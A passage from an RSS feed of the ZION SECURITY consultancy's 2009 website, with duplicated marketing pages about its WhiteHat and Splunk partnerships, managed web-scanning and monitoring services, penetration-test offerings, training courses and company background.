<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY is partner of WhiteHat Sec for his innovative web application scanning&nbsp;software called WhiteHat Sentinel.</p>
<p class="contenttext">WhiteHat Sentinel is built on a Software-as-a-Service (SaaS) platform designed from the ground up to scale massively, support the largest enterprises and offer the most compelling business efficiencies, lowering your overall cost of ownership.</p>
<p class="contenttext">We integrated WhiteHat Sentinel in our revolutionary service ZI<strong class="red">O</strong>N VERIFIED. With ZI<strong class="red">O</strong>N VERIFIED, you pay a single annual fee and you assess your applications as often as you like.</p>
<p class="contenttext">Click <a href="http://www.zionsecurity.com/our-solutions/zion-verified.aspx">here</a> for more information about ZI<strong class="red">O</strong>N VERIFIED.</p>
<p class="contenttext">For more information about WhiteHat Security, please visit <a href="http://www.whitehatsec.com">www.whitehatsec.com</a>.</p>
<p class="contenttext"><img src="/img-sec/zion_verified.gif" width="160" height="54" border="0" align="top"/><a href="/index.html"></a><a href="http://www.market2lead.com/images/customer_whitehat.gif"></a>&nbsp;<img src="/img-sec/partners/big/whitehat-logo.jpg" width="204" height="74"/></p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>About WhiteHat Security</span></p>
<p class="contenttext">WhiteHat Security was founded in August 2001 by a team led by Jeremiah Grossman, a security industry veteran and former Yahoo! information security officer. Jeremiah founded the company to provide a comprehensive solution to the growing problem of website security. The company is privately held and headquartered in Santa Clara, California, with sales offices in Austin, Texas and New York, New York.</p>
<p class="contenttext">WhiteHat develops comprehensive, easy-to-use, cost-effective solutions that enable companies to secure valuable customer data, meet federal compliance standards, and maintain customer confidence.</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY is partner of WhiteHat Sec for his innovative web application scanning&nbsp;software called WhiteHat Sentinel.</p>
<p class="contenttext">WhiteHat Sentinel is built on a Software-as-a-Service (SaaS) platform designed from the ground up to scale massively, support the largest enterprises and offer the most compelling business efficiencies, lowering your overall cost of ownership.</p>
<p class="contenttext">We integrated WhiteHat Sentinel in our revolutionary service ZI<strong class="red">O</strong>N VERIFIED. With ZI<strong class="red">O</strong>N VERIFIED, you pay a single annual fee and you assess your applications as often as you like.</p>
<p class="contenttext">Click <a href="http://www.zionsecurity.com/our-solutions/zion-verified.aspx">here</a> for more information about ZI<strong class="red">O</strong>N VERIFIED.</p>
<p class="contenttext">For more information about WhiteHat Security, please visit <a href="http://www.whitehatsec.com">www.whitehatsec.com</a>.</p>
<p class="contenttext"><img src="/img-sec/zion_verified.gif" width="160" height="54" border="0" align="top"/><a href="/index.html"></a><a href="http://www.market2lead.com/images/customer_whitehat.gif"></a>&nbsp;<img src="/img-sec/partners/big/whitehat-logo.jpg" width="204" height="74"/></p>]]></content:encoded></item><item><title>Splunk</title><link>http://www.zionsecurity.com/partners/splunk.aspx</link><pubDate>2009-07-28T17:16:24</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/splunk.aspx</guid><description><![CDATA[ <p><img src="/img-sec/partners/big/splunk.png" width="151" height="34" style="float: right;"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Splunk</span></p>
<p class="contenttext">Can you imagine the chaos using the Internet without a search engine?</p>
<p class="contenttext">Well, your datacenter is just as chaotic. Do you know at this moment&nbsp;what's happening in your IT infrastructure? How&nbsp;do you find the valuable information you need burled in all the logs? How&nbsp;do you detect the IT data your infrastructure generates every day?</p>
<p class="contenttext">Splunk has an answer on these specific questions.</p>]]></description><content:encoded><![CDATA[ <p><img src="/img-sec/partners/big/splunk.png" width="151" height="34" style="float: right;"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Splunk</span></p>
<p class="contenttext">Can you imagine the chaos using the Internet without a search engine?</p>
<p class="contenttext">Well, your datacenter is just as chaotic. Do you know at this moment&nbsp;what's happening in your IT infrastructure? How&nbsp;do you find the valuable information you need burled in all the logs? How&nbsp;do you detect the IT data your infrastructure generates every day?</p>
<p class="contenttext">Splunk has an answer on these specific questions.</p>]]></content:encoded></item><item><title>Your key benefits</title><link>http://www.zionsecurity.com/solutions/zion-verified/your-key-benefits.aspx</link><pubDate>2009-07-28T17:10:54</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/zion-verified/your-key-benefits.aspx</guid><description><![CDATA[ <div style="float:right;"><img src="/img-sec/zion_verified.gif" width="203" height="76" border="0" align="top"/></div>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>ZI<strong class="red">O</strong>N VERIFIED key benefits:</span></p>
<p class="contenttext">1. <span class="u">Managed Web Application Security</span></p>
<ul class="agenda">
<li>No need to hire external consultants or penetration testers for a <a href="/solutions/penetration-test.aspx">one-shot security audit</a></li>
<li>No need to <a href="/solutions/zion-university.aspx?show=ZION University">train</a> internal people about web application security and the most recent attacks and countermeasures</li>
<li>Custom-built web applications will be tested on a regular schedule&nbsp;</li>
<li>We provide clean, detailed information regarding each vulnerability identified (including remediation recommendations)</li>
<li>ZI<strong class="red">O</strong>N SECURITY will contact the right people in your organization to fix the vulnerabilities and we make sure that it is fixed!</li>
</ul>
<p class="contenttext">2. <span class="u">Predictable costs &amp; Unlimited assessments</span></p>
<ul class="agenda">
<li>ZI<strong class="red">O</strong>N VERIFIED is subscription based. So no matter how many times you run your application assessments, your costs remain the same.</li>
</ul>
<p class="contenttext">3. <span class="u">Turn-key service</span></p>
<ul class="agenda">
<li>No additional Staff or Infrastructure</li>
<li>No software configuration or management</li>
</ul>
<p class="contenttext">4. <span class="u">WAF Integration</span></p>
<ul class="agenda">
<li>A fast and safe <a href="/solutions/zion-secured.aspx?show=ZION SECURED">Web Application Firewall (WAF)</a> integration closes the loop between vulnerability detection and mitigation. Our security experts can install and configure a WAF to block all discovered vulnerabilities. ZI<strong class="red">O</strong>N VERIFIED integrates with the WAF of <a href="/partners/f5.aspx?show=F5">F5</a> or our <a href="/solutions/zion-secured.aspx?show=ZION SECURED">ZI<strong class="red">O</strong>N SECURED </a>solution.</li>
</ul>
<p class="contenttext">5. <span class="u">Scalable to fit any environment</span></p>
<ul class="agenda">
<li>ZI<strong class="red">O</strong>N VERIFIED can scale and assess the largest and most complex websites simultaneously</li>
</ul>]]></description><content:encoded><![CDATA[ <div style="float:right;"><img src="/img-sec/zion_verified.gif" width="203" height="76" border="0" align="top"/></div>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>ZI<strong class="red">O</strong>N VERIFIED key benefits:</span></p>
<p class="contenttext">1. <span class="u">Managed Web Application Security</span></p>
<ul class="agenda">
<li>No need to hire external consultants or penetration testers for a <a href="/solutions/penetration-test.aspx">one-shot security audit</a></li>
<li>No need to <a href="/solutions/zion-university.aspx?show=ZION University">train</a> internal people about web application security and the most recent attacks and countermeasures</li>
<li>Custom-built web applications will be tested on a regular schedule&nbsp;</li>
<li>We provide clean, detailed information regarding each vulnerability identified (including remediation recommendations)</li>
<li>ZI<strong class="red">O</strong>N SECURITY will contact the right people in your organization to fix the vulnerabilities and we make sure that it is fixed!</li>
</ul>
<p class="contenttext">2. <span class="u">Predictable costs &amp; Unlimited assessments</span></p>
<ul class="agenda">
<li>ZI<strong class="red">O</strong>N VERIFIED is subscription based. So no matter how many times you run your application assessments, your costs remain the same.</li>
</ul>
<p class="contenttext">3. <span class="u">Turn-key service</span></p>
<ul class="agenda">
<li>No additional Staff or Infrastructure</li>
<li>No software configuration or management</li>
</ul>
<p class="contenttext">4. <span class="u">WAF Integration</span></p>
<ul class="agenda">
<li>A fast and safe <a href="/solutions/zion-secured.aspx?show=ZION SECURED">Web Application Firewall (WAF)</a> integration closes the loop between vulnerability detection and mitigation. Our security experts can install and configure a WAF to block all discovered vulnerabilities. ZI<strong class="red">O</strong>N VERIFIED integrates with the WAF of <a href="/partners/f5.aspx?show=F5">F5</a> or our <a href="/solutions/zion-secured.aspx?show=ZION SECURED">ZI<strong class="red">O</strong>N SECURED </a>solution.</li>
</ul>
<p class="contenttext">5. <span class="u">Scalable to fit any environment</span></p>
<ul class="agenda">
<li>ZI<strong class="red">O</strong>N VERIFIED can scale and assess the largest and most complex websites simultaneously</li>
</ul>]]></content:encoded></item><item><title>ZION UNIVERSITY</title><link>http://www.zionsecurity.com/solutions/zion-university.aspx</link><pubDate>2009-07-28T16:39:02</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/zion-university.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>ZI<strong class="red">O</strong>N UNIVERSITY</span></p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY developed, together with experts in the security field, different courses for our customers.</p>
<p class="contenttext">These courses can be customized for each customer to match their technology and software development methodology.</p>
<p class="contenttext">Courses can be delivered in-house or off-site. Most courses are a mix of theory and hands-on labs.</p>
<div style="margin-left: 75px;">
<?UMBRACO_MACRO macroAlias="ZionSecurityEnRandomQuote" />
</div>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Planned courses</span></p>
<?UMBRACO_MACRO macroAlias="ZionSecurityAllEvents" />
<p>&nbsp;</p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Currently the following courses are available </span>(on request):</p>
<ul class="agenda">
<li><strong><em>Hacking Web Applications</em></strong>: how to discover and abuse security vulnerabilitities in web applications</li>
<li><strong><em>Security Testing</em></strong>: how to test a web application for known security vulnerabilities</li>
<li><strong><em>Penetration Testing</em></strong>: how to attack a network, infrastructure and application using open-source tools</li>
<li><strong><em>Network Security</em></strong>: what is required to protect your network against hackers</li>
<li><strong><em>Application Security for Java</em></strong>: how to build secure Java (web) applications</li>
<li><strong><em>Application Security for .NET</em></strong>: how to build secure .NET (web) applications</li>
<li><strong><em>Web Services Security</em></strong>: how to protect web services against hackers</li>
<li><strong><em>ModSecurity</em></strong>: how to configure and use ModSecurity, the open-source web application firewall.</li>
</ul>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>ZI<strong class="red">O</strong>N UNIVERSITY: Interested?</span></p>
<p class="contenttext">Want to know more?&nbsp;Ask <a href="/contact.aspx">here</a>&nbsp;for more information.</p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>ZI<strong class="red">O</strong>N UNIVERSITY</span></p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY developed, together with experts in the security field, different courses for our customers.</p>
<p class="contenttext">These courses can be customized for each customer to match their technology and software development methodology.</p>
<p class="contenttext">Courses can be delivered in-house or off-site. Most courses are a mix of theory and hands-on labs.</p>
<div style="margin-left: 75px;">
<?UMBRACO_MACRO macroAlias="ZionSecurityEnRandomQuote" />
</div>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Planned courses</span></p>
<?UMBRACO_MACRO macroAlias="ZionSecurityAllEvents" />
<p>&nbsp;</p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Currently the following courses are available </span>(on request):</p>
<ul class="agenda">
<li><strong><em>Hacking Web Applications</em></strong>: how to discover and abuse security vulnerabilitities in web applications</li>
<li><strong><em>Security Testing</em></strong>: how to test a web application for known security vulnerabilities</li>
<li><strong><em>Penetration Testing</em></strong>: how to attack a network, infrastructure and application using open-source tools</li>
<li><strong><em>Network Security</em></strong>: what is required to protect your network against hackers</li>
<li><strong><em>Application Security for Java</em></strong>: how to build secure Java (web) applications</li>
<li><strong><em>Application Security for .NET</em></strong>: how to build secure .NET (web) applications</li>
<li><strong><em>Web Services Security</em></strong>: how to protect web services against hackers</li>
<li><strong><em>ModSecurity</em></strong>: how to configure and use ModSecurity, the open-source web application firewall.</li>
</ul>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>ZI<strong class="red">O</strong>N UNIVERSITY: Interested?</span></p>
<p class="contenttext">Want to know more?&nbsp;Ask <a href="/contact.aspx">here</a>&nbsp;for more information.</p>]]></content:encoded></item><item><title>ZION MONITORED</title><link>http://www.zionsecurity.com/solutions/zion-monitored.aspx</link><pubDate>2009-07-28T16:22:54</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/zion-monitored.aspx</guid><description><![CDATA[ <div style="float:right;"><img src="/img-sec/zion_monitored.gif" width="203" height="76" border="0" align="top"/></div>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>ZI<strong class="red">O</strong>N MONITORED: Mission</span></p>
<p class="contenttext">Through ZI<strong class="red">O</strong>N MONITORED we help you to manage your systems.</p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>ZI<strong class="red">O</strong>N MONITORED: Working method</span></p>
<p class="contenttext">We install a small application on your client and server systems. This allows us to monitor your server, whenever something should go wrong, is it either software or system resources, we can respond to this malfunctioning and resolve the problem.</p>
<p class="contenttext">Next to the server monitoring, we provide both clients as server with the latest available updates. This way we ensure your network to be up to date. The client systems can request help through a ticket or a chat-session.</p>
<p class="contenttext">Whenever a client-computer needs assistance to which one of our technicians needs be physically there, our application allows us to remote control the client-computer and resolve the problem from our office.</p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>ZI<strong class="red">O</strong>N MONITORED: Interested?</span></p>
<p class="contenttext">Want to know more?&nbsp;Ask <a href="/contact.aspx">here</a>&nbsp;fore more information or a proposal without obligation.</p>]]></description><content:encoded><![CDATA[ <div style="float:right;"><img src="/img-sec/zion_monitored.gif" width="203" height="76" border="0" align="top"/></div>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>ZI<strong class="red">O</strong>N MONITORED: Mission</span></p>
<p class="contenttext">Through ZI<strong class="red">O</strong>N MONITORED we help you to manage your systems.</p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>ZI<strong class="red">O</strong>N MONITORED: Working method</span></p>
<p class="contenttext">We install a small application on your client and server systems. This allows us to monitor your server, whenever something should go wrong, is it either software or system resources, we can respond to this malfunctioning and resolve the problem.</p>
<p class="contenttext">Next to the server monitoring, we provide both clients as server with the latest available updates. This way we ensure your network to be up to date. The client systems can request help through a ticket or a chat-session.</p>
<p class="contenttext">Whenever a client-computer needs assistance to which one of our technicians needs be physically there, our application allows us to remote control the client-computer and resolve the problem from our office.</p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>ZI<strong class="red">O</strong>N MONITORED: Interested?</span></p>
<p class="contenttext">Want to know more?&nbsp;Ask <a href="/contact.aspx">here</a>&nbsp;fore more information or a proposal without obligation.</p>]]></content:encoded></item><item><title>Penetration test</title><link>http://www.zionsecurity.com/solutions/penetration-test.aspx</link><pubDate>2009-07-28T15:58:44</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/penetration-test.aspx</guid><description><![CDATA[ <p>&nbsp;<span class="title">&nbsp;<img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Penetration test</span></p>
<p class="contenttext">Do you wish to know if your IT infrastructure and web applications are protected sufficient against threats like virusses and hackers?</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY scans your infrastructure and applications, for a fixed price, for leaks and vulnerabilities. In a first meeting between the customer and our security experts, we discuss what exactly has to be tested and how. Penetration tests can be executed in different ways, namely Black box testing and White box testing.</p>
<p class="contenttext">Black box testing assumes no prior knowledge of the infrastructure and applications that has to be tested. We act like a real hacker and try to break into your applications and systems. Our security experts must first determine the location and extent of the systems, before beginning the analysis. White box testing provides the testers with complete knowledge of the infrastructure that has to be tested. This can include network diagrams and IP addressing information.</p>
<p class="contenttext">The customer decides which methods can be used to execute the penetration test and where the focus lays (on an infrastructure level or web application level).</p>
<p class="contenttext">Upon completion of this scan&nbsp;the customer&nbsp;will receive a final report containing:</p>
<ol class="agenda">
<li>The network scheme as identified by ZI<strong class="red">O</strong>N SECURITY</li>
<li>A list of vulnerabilities and leaks in your applications and systems</li>
<li>A plan of operation indicating the priority, possible cost and the time of implementation</li>
</ol>
<p class="contenttext">This report will be discussed at length with the responsible person regarding these matters in the company.</p>
<p class="contenttext"><strong>The difference between a penetration test and </strong><a href="/solutions/quick-scan.aspx?show=Quick Scan"><strong>Quick Scan </strong></a><strong>is that a penetration test has a larger scope and is not limited in time. A penetration test is ideal for obtaining a clear picture of the general security level of your organization.</strong></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Files<br /></span></p>
<p class="contenttext"><a href="/protected/ZION SECURITY Services - Design Review.pdf">ZION SECURITY Services - Design Review.pdf</a></p>
<p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Interested?</span></p>
<p class="contenttext"><a href="/contact.aspx">Ask</a> here for more information or&nbsp;an offer without obligation. However when&nbsp;a one-time audit of your web applications is not enough, please check out or new service <a href="/solutions/zion-verified.aspx?show=ZION VERIFIED">ZI<strong>O</strong>N VERIFIED</a>.</p>]]></description><content:encoded><![CDATA[ <p>&nbsp;<span class="title">&nbsp;<img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Penetration test</span></p>
<p class="contenttext">Do you wish to know if your IT infrastructure and web applications are protected sufficient against threats like virusses and hackers?</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY scans your infrastructure and applications, for a fixed price, for leaks and vulnerabilities. In a first meeting between the customer and our security experts, we discuss what exactly has to be tested and how. Penetration tests can be executed in different ways, namely Black box testing and White box testing.</p>
<p class="contenttext">Black box testing assumes no prior knowledge of the infrastructure and applications that has to be tested. We act like a real hacker and try to break into your applications and systems. Our security experts must first determine the location and extent of the systems, before beginning the analysis. White box testing provides the testers with complete knowledge of the infrastructure that has to be tested. This can include network diagrams and IP addressing information.</p>
<p class="contenttext">The customer decides which methods can be used to execute the penetration test and where the focus lays (on an infrastructure level or web application level).</p>
<p class="contenttext">Upon completion of this scan&nbsp;the customer&nbsp;will receive a final report containing:</p>
<ol class="agenda">
<li>The network scheme as identified by ZI<strong class="red">O</strong>N SECURITY</li>
<li>A list of vulnerabilities and leaks in your applications and systems</li>
<li>A plan of operation indicating the priority, possible cost and the time of implementation</li>
</ol>
<p class="contenttext">This report will be discussed at length with the responsible person regarding these matters in the company.</p>
<p class="contenttext"><strong>The difference between a penetration test and </strong><a href="/solutions/quick-scan.aspx?show=Quick Scan"><strong>Quick Scan </strong></a><strong>is that a penetration test has a larger scope and is not limited in time. A penetration test is ideal for obtaining a clear picture of the general security level of your organization.</strong></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Files<br /></span></p>
<p class="contenttext"><a href="/protected/ZION SECURITY Services - Design Review.pdf">ZION SECURITY Services - Design Review.pdf</a></p>
<p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Interested?</span></p>
<p class="contenttext"><a href="/contact.aspx">Ask</a> here for more information or&nbsp;an offer without obligation. However when&nbsp;a one-time audit of your web applications is not enough, please check out or new service <a href="/solutions/zion-verified.aspx?show=ZION VERIFIED">ZI<strong>O</strong>N VERIFIED</a>.</p>]]></content:encoded></item><item><title>ZION SECURITY in De Standaard</title><link>http://www.zionsecurity.com/news/zion-security-in-de-standaard.aspx</link><pubDate>2009-07-28T11:16:03</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/zion-security-in-de-standaard.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Erwin Geirnaert about Conficker</title><link>http://www.zionsecurity.com/news/erwin-geirnaert-about-conficker.aspx</link><pubDate>2009-07-28T11:15:25</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/erwin-geirnaert-about-conficker.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Whitepaper ZEND &amp; OWASP ESAPI for PHP launched</title><link>http://www.zionsecurity.com/news/whitepaper-zend--owasp-esapi-for-php-launched.aspx</link><pubDate>2009-07-28T11:14:46</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/whitepaper-zend--owasp-esapi-for-php-launched.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Whitepaper: An overview of the current situation in the web application security landscape</title><link>http://www.zionsecurity.com/news/whitepaper-an-overview-of-the-current-situation-in-the-web-application-security-landscape.aspx</link><pubDate>2009-07-28T11:11:22</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/whitepaper-an-overview-of-the-current-situation-in-the-web-application-security-landscape.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Mollom HTTPModule BETA Release</title><link>http://www.zionsecurity.com/news/mollom-httpmodule-beta-release.aspx</link><pubDate>2009-07-28T11:06:42</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/mollom-httpmodule-beta-release.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Downloads</title><link>http://www.zionsecurity.com/downloads.aspx</link><pubDate>2009-07-28T11:02:31</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/downloads.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Presentations, papers and cases</span></p>
<p class="contenttext">Here you can download some of our technical papers and presentations. More papers will be added in the near future.</p>
<p class="contenttext">The presentation "<a href="/protected/Security for virtualization_final.pdf">Security for Virtualization</a>" from the Infosecurity conference (march 2009).</p>
<p class="contenttext">The presentation "Hacking the SOA" from the Enterprise SOA Conference is available <a href="/protected/soa.pdf">here</a>.</p>
<p class="contenttext">The presentation <a href="/protected/appsec2006eu.pdf">"Can (Automated) Testing Tools Really Find the OWASP Top 10?"</a> from the OWASP Application Security Conference Europe 2006.</p>
<p class="contenttext">The first paper is "<a href="/protected/getting_started_with_owasp_webgoat_4.0_and_soapui.pdf">Getting started with OWASP WebGoat and SOAPUI</a>", written by Philippe Bogaerts.</p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Presentations, papers and cases</span></p>
<p class="contenttext">Here you can download some of our technical papers and presentations. More papers will be added in the near future.</p>
<p class="contenttext">The presentation "<a href="/protected/Security for virtualization_final.pdf">Security for Virtualization</a>" from the Infosecurity conference (march 2009).</p>
<p class="contenttext">The presentation "Hacking the SOA" from the Enterprise SOA Conference is available <a href="/protected/soa.pdf">here</a>.</p>
<p class="contenttext">The presentation <a href="/protected/appsec2006eu.pdf">"Can (Automated) Testing Tools Really Find the OWASP Top 10?"</a> from the OWASP Application Security Conference Europe 2006.</p>
<p class="contenttext">The first paper is "<a href="/protected/getting_started_with_owasp_webgoat_4.0_and_soapui.pdf">Getting started with OWASP WebGoat and SOAPUI</a>", written by Philippe Bogaerts.</p>]]></content:encoded></item><item><title>Company</title><link>http://www.zionsecurity.com/company.aspx</link><pubDate>2009-07-28T10:49:50</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/company.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Our name&nbsp;</span></p>
<p class="contenttext">In the movie "The Matrix" ZI<strong class="red">O</strong>N was&nbsp;the last safe place for humans in a world dominated by machines. The security of ZI<strong class="red">O</strong>N consisted of multiple layers of defense, just like&nbsp;ZI<strong class="red">O</strong>N SECURITY approaches information security. More information can be found&nbsp;at <a href="http://en.wikipedia.org/wiki/Zion_%28The_Matrix%29" target="_blank">Wikipedia</a>.</p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Our mission</span></p>
<p class="contenttext"><strong><span class="timepost">Securing your busines value by securing your applications.</span></strong></p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Our name&nbsp;</span></p>
<p class="contenttext">In the movie "The Matrix" ZI<strong class="red">O</strong>N was&nbsp;the last safe place for humans in a world dominated by machines. The security of ZI<strong class="red">O</strong>N consisted of multiple layers of defense, just like&nbsp;ZI<strong class="red">O</strong>N SECURITY approaches information security. More information can be found&nbsp;at <a href="http://en.wikipedia.org/wiki/Zion_%28The_Matrix%29" target="_blank">Wikipedia</a>.</p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Our mission</span></p>
<p class="contenttext"><strong><span class="timepost">Securing your busines value by securing your applications.</span></strong></p>]]></content:encoded></item><item><title>Partners</title><link>http://www.zionsecurity.com/partners.aspx</link><pubDate>2009-07-28T10:49:16</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Our technology&nbsp;partners</span></p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY has selected the world leading software solutions in the field of web application security and application security. Our technology partners are Breach Security, F5, Splunk, WhiteHat Security, Testronic Labs, Tufin, Marshal&nbsp;and Fortify.</p>
<p class="contenttext">With these solutions ZI<strong class="red">O</strong>N SECURITYs application security experts can assess, secure and protect your critical business applications in a managed way. Every organization can outsource their application security needs to ZI<strong class="red">O</strong>N SECURITY, we know where and how to find the vulnerabilities in your critical business applications!</p>
<p class="contenttext">On top of that we secure your business value, for example securing your VPN connection.</p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Our technology&nbsp;partners</span></p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY has selected the world leading software solutions in the field of web application security and application security. Our technology partners are Breach Security, F5, Splunk, WhiteHat Security, Testronic Labs, Tufin, Marshal&nbsp;and Fortify.</p>
<p class="contenttext">With these solutions ZI<strong class="red">O</strong>N SECURITYs application security experts can assess, secure and protect your critical business applications in a managed way. Every organization can outsource their application security needs to ZI<strong class="red">O</strong>N SECURITY, we know where and how to find the vulnerabilities in your critical business applications!</p>
<p class="contenttext">On top of that we secure your business value, for example securing your VPN connection.</p>]]></content:encoded></item><item><title>Solutions</title><link>http://www.zionsecurity.com/solutions.aspx</link><pubDate>2009-07-28T10:48:46</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions.aspx</guid><description><![CDATA[ <p><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/><span class="title">Our solutions</span></p>
<p class="contenttext">Our mission is to secure your business value by securing your applications.</p>
<p class="contenttext">Securing this value is a continuous process, specific depending on the customer's situation.</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY has a customer oriented approach and can offer a global solution and this for every company with its own needs and requests.</p>
<p class="contenttext">For every security project we follow the following steps:</p>
<ul class="agenda">
<li>At the start of the security project we analyze together with the customer the actual and future needs concerning security.</li>
<li>With this analysis we propose the customer a specific solution.</li>
<li>In the next step our security experts perform the solution, as described in the previous phase.</li>
<li>After performing the security project, our experts&nbsp;support the customer where needed.</li>
</ul>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY believes in the delivery of a high quality and precise work for such delicate projects. ZI<strong class="red">O</strong>N SECURITY guarantees such a quality.</p>
<p class="contenttext">&nbsp;</p>]]></description><content:encoded><![CDATA[ <p><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/><span class="title">Our solutions</span></p>
<p class="contenttext">Our mission is to secure your business value by securing your applications.</p>
<p class="contenttext">Securing this value is a continuous process, specific depending on the customer's situation.</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY has a customer oriented approach and can offer a global solution and this for every company with its own needs and requests.</p>
<p class="contenttext">For every security project we follow the following steps:</p>
<ul class="agenda">
<li>At the start of the security project we analyze together with the customer the actual and future needs concerning security.</li>
<li>With this analysis we propose the customer a specific solution.</li>
<li>In the next step our security experts perform the solution, as described in the previous phase.</li>
<li>After performing the security project, our experts&nbsp;support the customer where needed.</li>
</ul>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY believes in the delivery of a high quality and precise work for such delicate projects. ZI<strong class="red">O</strong>N SECURITY guarantees such a quality.</p>
<p class="contenttext">&nbsp;</p>]]></content:encoded></item></channel></rss>